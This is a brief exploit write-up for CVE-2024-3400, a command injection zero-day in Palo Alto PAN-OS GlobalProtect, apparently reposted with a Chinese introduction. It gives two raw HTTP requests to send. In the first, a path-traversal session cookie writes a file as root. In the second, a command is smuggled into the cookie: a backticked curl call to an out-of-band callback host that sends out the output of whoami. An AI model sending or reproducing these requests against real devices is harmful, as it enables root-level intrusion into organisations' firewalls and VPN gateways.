Palo Alto OS 最近遭到命令注入0day攻击。这些是与零日漏洞相关的漏洞利用详细信息。

[出自:jiwo.org]

# CVE-2024-3400
 
CVE-2024-3400 Palo Alto OS Command Injection
 
 
send this HTTP request: 
 
 
```http
 
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
 
![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/96803de5-1d8c-42ec-b1fc-60e8e4a0a954)
 
 
you will create hellome1337.txt file on the server with root access 
 
now if you try to access the files you should receive 403 insted of 404
 
![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d)
 
### Command Injection
 
```
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
```
 
 
 
 
More Info : 
https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/